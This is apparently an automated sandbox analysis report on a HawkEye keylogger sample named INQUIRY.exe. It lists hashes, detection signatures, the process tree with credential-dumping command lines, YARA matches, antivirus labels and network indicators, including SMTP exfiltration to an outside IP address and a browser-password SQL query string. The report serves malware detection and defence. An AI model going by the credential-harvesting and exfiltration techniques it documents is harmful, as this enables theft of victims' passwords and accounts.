Analysis Report INQUIRY.exe

Overview

General Information

Sample Name: INQUIRY.exe
Analysis ID: 319686
MD5: 0b940145d7d02e5b1b975c99dd5197a4
SHA1: 53ae0b576f7b362b90a25ace1470d33068db4490
SHA256: bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
Tags: exe, HawkEye

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Startup

  • System is w10x64
  • INQUIRY.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
    • INQUIRY.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • dw20.exe (PID: 6868 cmdline: dw20.exe -x -s 2308 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • WerFault.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • INQUIRY.exe (PID: 5788 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • INQUIRY.exe (PID: 6076 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
        • INQUIRY.exe (PID: 6808 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • dw20.exe (PID: 6936 cmdline: dw20.exe -x -s 2272 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 5684 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 1076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • INQUIRY.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • INQUIRY.exe (PID: 6400 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
            • INQUIRY.exe (PID: 240 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • dw20.exe (PID: 204 cmdline: dw20.exe -x -s 2100 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
            • INQUIRY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • INQUIRY.exe (PID: 6900 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                • INQUIRY.exe (PID: 1364 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                  • dw20.exe (PID: 6380 cmdline: dw20.exe -x -s 2284 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                  • vbc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • vbc.exe (PID: 3064 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
                • INQUIRY.exe (PID: 4424 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x59d3e3:$key: HawkEyeKeylogger
  • 0x59f613:$salt: 099u787978786
  • 0x59da24:$string1: HawkEye_Keylogger
  • 0x59e863:$string1: HawkEye_Keylogger
  • 0x59f573:$string1: HawkEye_Keylogger
  • 0x59ddf9:$string2: holdermail.txt
  • 0x59de19:$string2: holdermail.txt
  • 0x59dd3b:$string3: wallet.dat
  • 0x59dd53:$string3: wallet.dat
  • 0x59dd69:$string3: wallet.dat
  • 0x59f137:$string4: Keylog Records
  • 0x59f44f:$string4: Keylog Records
  • 0x59f66b:$string5: do not script -->
  • 0x59d3cb:$string6: \pidloc.txt
  • 0x59d459:$string7: BSPLIT
  • 0x59d469:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
    • 0x59da7c:$hawkstr1: HawkEye Keylogger
    • 0x59e8a9:$hawkstr1: HawkEye Keylogger
    • 0x59ebd8:$hawkstr1: HawkEye Keylogger
    • 0x59ed33:$hawkstr1: HawkEye Keylogger
    • 0x59ee96:$hawkstr1: HawkEye Keylogger
    • 0x59f10f:$hawkstr1: HawkEye Keylogger
    • 0x59d60a:$hawkstr2: Dear HawkEye Customers!
    • 0x59ec2b:$hawkstr2: Dear HawkEye Customers!
    • 0x59ed82:$hawkstr2: Dear HawkEye Customers!
    • 0x59eee9:$hawkstr2: Dear HawkEye Customers!
    • 0x59d72b:$hawkstr3: HawkEye Logger Details:
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
    • 0x5a504d:$key: HawkEyeKeylogger
    • 0x5a727d:$salt: 099u787978786
    • 0x5a568e:$string1: HawkEye_Keylogger
    • 0x5a64cd:$string1: HawkEye_Keylogger
    • 0x5a71dd:$string1: HawkEye_Keylogger
    • 0x5a5a63:$string2: holdermail.txt
    • 0x5a5a83:$string2: holdermail.txt
    • 0x5a59a5:$string3: wallet.dat
    • 0x5a59bd:$string3: wallet.dat
    • 0x5a59d3:$string3: wallet.dat
    • 0x5a6da1:$string4: Keylog Records
    • 0x5a70b9:$string4: Keylog Records
    • 0x5a72d5:$string5: do not script -->
    • 0x5a5035:$string6: \pidloc.txt
    • 0x5a50c3:$string7: BSPLIT
    • 0x5a50d3:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
      • 0x7b89c:$key: HawkEyeKeylogger
      • 0x7dacc:$salt: 099u787978786
      • 0x7bedd:$string1: HawkEye_Keylogger
      • 0x7cd1c:$string1: HawkEye_Keylogger
      • 0x7da2c:$string1: HawkEye_Keylogger
      • 0x7c2b2:$string2: holdermail.txt
      • 0x7c2d2:$string2: holdermail.txt
      • 0x7c1f4:$string3: wallet.dat
      • 0x7c20c:$string3: wallet.dat
      • 0x7c222:$string3: wallet.dat
      • 0x7d5f0:$string4: Keylog Records
      • 0x7d908:$string4: Keylog Records
      • 0x7db24:$string5: do not script -->
      • 0x7b884:$string6: \pidloc.txt
      • 0x7b912:$string7: BSPLIT
      • 0x7b922:$string7: BSPLIT
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
            • 0x7bf35:$hawkstr1: HawkEye Keylogger
            • 0x7cd62:$hawkstr1: HawkEye Keylogger
            • 0x7d091:$hawkstr1: HawkEye Keylogger
            • 0x7d1ec:$hawkstr1: HawkEye Keylogger
            • 0x7d34f:$hawkstr1: HawkEye Keylogger
            • 0x7d5c8:$hawkstr1: HawkEye Keylogger
            • 0x7bac3:$hawkstr2: Dear HawkEye Customers!
            • 0x7d0e4:$hawkstr2: Dear HawkEye Customers!
            • 0x7d23b:$hawkstr2: Dear HawkEye Customers!
            • 0x7d3a2:$hawkstr2: Dear HawkEye Customers!
            • 0x7bbe4:$hawkstr3: HawkEye Logger Details:

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
              • 0x112984:$key: HawkEyeKeylogger
              • 0x114bb4:$salt: 099u787978786
              • 0x112fc5:$string1: HawkEye_Keylogger
              • 0x113e04:$string1: HawkEye_Keylogger
              • 0x114b14:$string1: HawkEye_Keylogger
              • 0x11339a:$string2: holdermail.txt
              • 0x1133ba:$string2: holdermail.txt
              • 0x1132dc:$string3: wallet.dat
              • 0x1132f4:$string3: wallet.dat
              • 0x11330a:$string3: wallet.dat
              • 0x1146d8:$string4: Keylog Records
              • 0x1149f0:$string4: Keylog Records
              • 0x114c0c:$string5: do not script -->
              • 0x11296c:$string6: \pidloc.txt
              • 0x1129fa:$string7: BSPLIT
              • 0x112a0a:$string7: BSPLIT
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: vbc.exe.6700.6.memstr, Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: INQUIRY.exe, Virustotal: Detection: 43%
Source: INQUIRY.exe, ReversingLabs: Detection: 41%
Machine Learning detection for sample
Source: INQUIRY.exe, Joe Sandbox ML: detected
Source: 16.2.INQUIRY.exe.22e0000.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 32.2.INQUIRY.exe.2680000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 32.2.INQUIRY.exe.2680000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.21e0000.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 1.2.INQUIRY.exe.2270000.2.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.2270000.2.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 16.2.INQUIRY.exe.2370000.2.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.2370000.2.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.INQUIRY.exe.2640000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 0.2.INQUIRY.exe.2640000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 27.2.INQUIRY.exe.2640000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 27.2.INQUIRY.exe.2640000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.400000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.400000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.INQUIRY.exe.25f0000.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.22f0000.2.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.22f0000.2.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.2300000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.2300000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 16.2.INQUIRY.exe.2490000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.2490000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.2210000.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 28.2.INQUIRY.exe.400000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.400000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 13.2.INQUIRY.exe.2660000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.INQUIRY.exe.2660000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.2380000.3.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.2380000.3.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 32.2.INQUIRY.exe.2630000.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.7a0000.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 16.2.INQUIRY.exe.400000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.400000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 27.2.INQUIRY.exe.25e0000.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.2240000.2.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.2240000.2.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.400000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.400000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Binary or memory string: autorun.inf
Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Binary or memory string: [autorun]
Source: INQUIRY.exe, Binary or memory string: [autorun]
Source: INQUIRY.exe, Binary or memory string: autorun.inf
Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Binary or memory string: autorun.inf
Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Binary or memory string: [autorun]
Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Binary or memory string: autorun.inf
Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Binary or memory string: [autorun]
Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Binary or memory string: autorun.inf
Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Binary or memory string: [autorun]
Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 2_2_004089B8 FindFirstFileA,GetLastError,2_2_004089B8
Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,6_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,6_2_00407E0E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
Source: Traffic, Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
May check the online IP address of the machine
Source: unknown, DNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: global traffic; TCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
                    Source: Joe Sandbox View; IP Address: 104.16.154.36
                    Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: unknown; DNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
